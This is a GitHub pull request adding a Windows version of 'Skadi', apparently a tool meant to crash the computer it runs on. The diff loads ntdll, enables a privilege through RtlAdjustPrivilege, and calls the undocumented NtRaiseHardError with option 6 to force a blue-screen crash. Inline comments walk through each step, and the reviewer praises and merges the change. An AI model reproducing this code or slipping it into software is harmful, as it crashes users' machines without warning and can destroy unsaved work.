### PR TITLE
Skadi for Windows

### PR DESCRIPTION
**Pull request by ghost**

### CODE REVIEW

**Comment by DigitMan27** [comment]
@xorz57 explain what you do inside the code.

File: Skadi/Skadi.cpp [hunk 1]
```diff
@@ -12,7 +12,14 @@ void linux_skadi() {
 #elif _WIN32
 
 void windows_skadi() {
-	// TODO
+	BOOLEAN bEnabled;
+	ULONG uResp;
+	LPVOID lpFuncAddress = GetProcAddress(LoadLibraryA("ntdll.dll"), "RtlAdjustPrivilege");
```
Comment (ghost) [inline Skadi/Skadi.cpp:17]: I load the `ntdll` library

File: Skadi/Skadi.cpp [hunk 2]
```diff
@@ -12,7 +12,14 @@ void linux_skadi() {
...
+	LPVOID lpFuncAddress2 = GetProcAddress(GetModuleHandle("ntdll.dll"), "NtRaiseHardError");
```
Comment (ghost) [inline Skadi/Skadi.cpp:18]: I get the function NtRaiseHardError from the `ntdll` library

File: Skadi/Skadi.cpp [hunk 3]
```diff
@@ -12,7 +12,14 @@ void linux_skadi() {
...
+	pdef_RtlAdjustPrivilege NtCall = (pdef_RtlAdjustPrivilege)lpFuncAddress;
+	pdef_NtRaiseHardError NtCall2 = (pdef_NtRaiseHardError)lpFuncAddress2;
+	NTSTATUS NtRet = NtCall(19, TRUE, FALSE, &bEnabled);
+	NtCall2(STATUS_FLOAT_MULTIPLE_FAULTS, 0, 0, 0, 6, &uResp);
```
Comment (ghost) [inline Skadi/Skadi.cpp:22]: That `6` on the fifth parameter causes the BSOD.
NtRaiseHardError is undocumented.

**Comment by ghost** [comment]
@DigitMan27 Done. Check the comments

**Comment by DigitMan27** [comment]
@xorz57 Nicely done.
[link for ntdll.dll](https://source.winehq.org/WineAPI/ntdll.html)

**Comment by DigitMan27** [comment]
@xorz57 I merge now.

**Pull request merged**